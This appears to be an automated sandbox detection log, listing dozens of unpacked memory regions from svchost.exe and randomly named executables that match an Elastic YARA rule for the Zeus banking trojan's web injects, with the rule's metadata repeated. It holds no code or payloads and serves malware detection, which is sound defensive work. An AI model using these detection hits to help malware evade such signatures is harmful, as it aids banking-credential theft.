Source: 2.3.svchost.exe.37f0000.38.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 32.2.nFjEHtbDTFjy.exe.32f0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 7.2.nFjEHtbDTFjy.exe.2dc0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 32.2.nFjEHtbDTFjy.exe.3042000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 34.2.nFjEHtbDTFjy.exe.2d82000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.888400.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.16.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 14.2.nFjEHtbDTFjy.exe.2a82000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.20.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.OjKmJJm2YT.exe.83b298.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2bb0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2a02000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.18.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.OjKmJJm2YT.exe.841298.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.23.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 24.2.nFjEHtbDTFjy.exe.d92000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2c13c00.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 38.2.nFjEHtbDTFjy.exe.2562000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.40.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.889000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.OjKmJJm2YT.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 7.2.nFjEHtbDTFjy.exe.2dc0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.nFjEHtbDTFjy.exe.c92000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2ab0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.nFjEHtbDTFjy.exe.1472000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 21.2.nFjEHtbDTFjy.exe.2440000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2c13c00.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.21.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
The rule above matched in each of the following sources, all of type UNPACKEDPE:
Source: 2.3.svchost.exe.888400.4.unpack
Source: 2.3.svchost.exe.37f0000.29.raw.unpack
Source: 2.3.svchost.exe.37f0000.17.unpack
Source: 2.3.svchost.exe.37f0000.23.raw.unpack
Source: 28.2.nFjEHtbDTFjy.exe.29a2000.1.raw.unpack
Source: 5.2.nFjEHtbDTFjy.exe.632000.1.raw.unpack
Source: 24.2.nFjEHtbDTFjy.exe.2a10000.2.unpack
Source: 24.2.nFjEHtbDTFjy.exe.2a10000.2.raw.unpack
Source: 38.2.nFjEHtbDTFjy.exe.27f0000.2.unpack
Source: 36.2.nFjEHtbDTFjy.exe.c92000.1.unpack
Source: 2.2.svchost.exe.2a56c00.4.unpack
Source: 2.3.svchost.exe.37f0000.22.raw.unpack
Source: 2.3.svchost.exe.37f0000.31.unpack
Source: 2.3.svchost.exe.37f0000.10.raw.unpack
Source: 2.3.svchost.exe.37f0000.28.raw.unpack
Source: 2.3.svchost.exe.37f0000.32.raw.unpack
Source: 2.3.svchost.exe.37f0000.18.raw.unpack
Source: 30.2.nFjEHtbDTFjy.exe.2480000.2.unpack
Source: 2.3.svchost.exe.37f0000.39.raw.unpack
Source: 2.2.svchost.exe.2a02000.3.raw.unpack
Source: 2.3.svchost.exe.37f0000.15.unpack
Source: 2.3.svchost.exe.37f0000.25.raw.unpack
Source: 2.3.svchost.exe.37f0000.27.unpack
Source: 38.2.nFjEHtbDTFjy.exe.2562000.1.raw.unpack
Source: 28.2.nFjEHtbDTFjy.exe.2b00000.2.unpack
Source: 2.3.svchost.exe.883000.3.raw.unpack
Source: 14.2.nFjEHtbDTFjy.exe.2ae0000.2.unpack
Source: 28.2.nFjEHtbDTFjy.exe.2b00000.2.raw.unpack
Source: 2.3.svchost.exe.37f0000.40.raw.unpack
Source: 2.3.svchost.exe.37f0000.19.raw.unpack
Source: 2.3.svchost.exe.37f0000.12.unpack
Source: 14.2.nFjEHtbDTFjy.exe.2a82000.1.unpack
Source: 11.2.nFjEHtbDTFjy.exe.2d92000.1.raw.unpack
Source: 2.2.svchost.exe.2bb0000.5.unpack
Source: 2.3.svchost.exe.37f0000.21.raw.unpack
Source: 16.2.nFjEHtbDTFjy.exe.29f2000.1.unpack
Source: 0.3.OjKmJJm2YT.exe.840698.2.unpack
Source: 2.3.svchost.exe.37f0000.25.unpack
Source: 2.3.svchost.exe.883000.3.unpack
Source: 2.3.svchost.exe.37f0000.9.raw.unpack
Source: 2.2.svchost.exe.407000.1.unpack
Source: 2.3.svchost.exe.37f0000.24.unpack
Source: 6.2.nFjEHtbDTFjy.exe.14d0000.2.unpack
Source: 38.2.nFjEHtbDTFjy.exe.27f0000.2.raw.unpack
Source: 2.2.svchost.exe.2a56c00.4.raw.unpack
Source: 32.2.nFjEHtbDTFjy.exe.3042000.1.raw.unpack
Source: 26.2.nFjEHtbDTFjy.exe.20f2000.1.raw.unpack
Source: 2.3.svchost.exe.37f0000.26.unpack
Source: 2.3.svchost.exe.37f0000.39.unpack
Source: 14.2.nFjEHtbDTFjy.exe.2ae0000.2.raw.unpack
Source: 6.2.nFjEHtbDTFjy.exe.1472000.1.raw.unpack
Source: 2.3.svchost.exe.37f0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
